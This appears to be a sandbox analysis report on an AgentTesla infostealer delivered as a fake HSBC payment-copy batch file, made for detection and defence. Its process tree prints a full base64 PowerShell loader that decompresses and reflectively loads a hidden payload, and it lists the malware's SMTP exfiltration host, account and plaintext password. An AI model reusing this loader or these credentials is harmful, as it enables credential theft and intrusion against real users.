Analysis
-
max time kernel
115s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
30-03-2024 01:38
Static task
static1
Behavioral task
behavioral1
Sample
HSBC Singapore_Payment Copy_Pdf.bat
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
HSBC Singapore_Payment Copy_Pdf.bat
Resource
win10v2004-20240226-en
General
-
Target
HSBC Singapore_Payment Copy_Pdf.bat
-
Size
225KB
-
MD5
3d95c53e26f3b959e7fe913ddc859a7d
-
SHA1
fc5961aac9b29d2822204df5efd44c5eee4557cf
-
SHA256
c7a329a0f9ccd316709e97776b17f237466b2f27c274d0887d4e445ab31c245e
-
SHA512
24e9c239f40884d996f833f8fe045f140e4345d5fd64a20edda999bd1b078e8b4faaa6a5f9897613f90848b82c206f3a6a5e4b6acaeaceccb7d576c93d0ca154
-
SSDEEP
6144:Bj7eSsWZevR/qwMVvT2sS7MaEEaeFPKL3eFTr+BArwfJWiE:BGSr6iwMVIVNCLuF++KE
Malware Config
Extracted
Protocol: smtp- Host:
mail.bfm.com.mk - Port:
587 - Username:
[email protected] - Password:
Sonja1234@@4321
Extracted
agenttesla
Protocol: smtp- Host:
mail.bfm.com.mk - Port:
587 - Username:
[email protected] - Password:
Sonja1234@@4321 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\opera.bat powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\opera.bat powershell.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 16 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3516 set thread context of 2972 3516 powershell.exe RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exeRegAsm.exepid process 4828 powershell.exe 4828 powershell.exe 4828 powershell.exe 3516 powershell.exe 3516 powershell.exe 3516 powershell.exe 2972 RegAsm.exe 2972 RegAsm.exe 2972 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 4828 powershell.exe Token: SeDebugPrivilege 3516 powershell.exe Token: SeDebugPrivilege 2972 RegAsm.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
cmd.execmd.exepowershell.exedescription pid process target process PID 1060 wrote to memory of 3724 1060 cmd.exe cmd.exe PID 1060 wrote to memory of 3724 1060 cmd.exe cmd.exe PID 3724 wrote to memory of 4828 3724 cmd.exe powershell.exe PID 3724 wrote to memory of 4828 3724 cmd.exe powershell.exe PID 3724 wrote to memory of 4828 3724 cmd.exe powershell.exe PID 3724 wrote to memory of 3516 3724 cmd.exe powershell.exe PID 3724 wrote to memory of 3516 3724 cmd.exe powershell.exe PID 3724 wrote to memory of 3516 3724 cmd.exe powershell.exe PID 3516 wrote to memory of 2972 3516 powershell.exe RegAsm.exe PID 3516 wrote to memory of 2972 3516 powershell.exe RegAsm.exe PID 3516 wrote to memory of 2972 3516 powershell.exe RegAsm.exe PID 3516 wrote to memory of 2972 3516 powershell.exe RegAsm.exe PID 3516 wrote to memory of 2972 3516 powershell.exe RegAsm.exe PID 3516 wrote to memory of 2972 3516 powershell.exe RegAsm.exe PID 3516 wrote to memory of 2972 3516 powershell.exe RegAsm.exe PID 3516 wrote to memory of 2972 3516 powershell.exe RegAsm.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\HSBC Singapore_Payment Copy_Pdf.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\HSBC Singapore_Payment Copy_Pdf.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3724 -
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KDQokZW5jb2RlZEFycmF5ID0gQCgxNTksMjIwLDIzOCwyMzgsMjI0LDIzMiwyMjEsMjMxLDI0NCwxNjksMTkyLDIzMywyMzksMjM3LDI0NCwyMDMsMjM0LDIyOCwyMzMsMjM5LDE2OSwxOTYsMjMzLDI0MSwyMzQsMjMwLDIyNCwxNjMsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjcsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjQsMTgyKQ0KJGRlY29kZWRTdHJpbmcgPSBDb252ZXJ0LUFzY2lpVG9TdHJpbmcgJGVuY29kZWRBcnJheQ0KDQoNCiRmaWxlUGF0aCA9IEpvaW4tUGF0aCAkZW52OlVzZXJQcm9maWxlICJvcGVyYS5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\Admin\opera.ps1' -Encoding UTF8"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4828 -
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\opera.ps1"3⤵
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3516 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2972
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3812 --field-trial-handle=2272,i,11831746627654527593,10138103687018060346,262144 --variations-seed-version /prefetch:81⤵PID:3032
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
Filesize
16KB
MD52132a4e7b64cf4debb99d3fb02f01496
SHA1f8d798860d95327dd90ca8f65fa8fee026895e77
SHA25649ead8f50c195401fe745b1abe3a059289e8677ae3341554047f854dd8aae0ea
SHA512f24d30182920e0f683c0cd590c122cdf6fe20357079207ee0d88c0d002adc268009dfeb574dc6cf3d6f3b4bfccb786456e74a53d1e09c713af39056e655d4227
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
225KB
MD53d95c53e26f3b959e7fe913ddc859a7d
SHA1fc5961aac9b29d2822204df5efd44c5eee4557cf
SHA256c7a329a0f9ccd316709e97776b17f237466b2f27c274d0887d4e445ab31c245e
SHA51224e9c239f40884d996f833f8fe045f140e4345d5fd64a20edda999bd1b078e8b4faaa6a5f9897613f90848b82c206f3a6a5e4b6acaeaceccb7d576c93d0ca154
-
Filesize
1KB
MD5e1ba00616d2ed17807a1b2687728a7cd
SHA17c881c3fd10f576a4c8cc033072de5b572a241ce
SHA2563e8dbfb794f86f59b7632fc6184ee4b5e8453b89cea0576fe889a5ad50f2ab7c
SHA512f60b795c9b13215d376003663f27c1324c4e7a76d5d5f473fd18f42a2e44b56f6ce47f9a9a44f68aea71b0d34ede0bac1ec8743ef01cda681d14ca07527c1ebf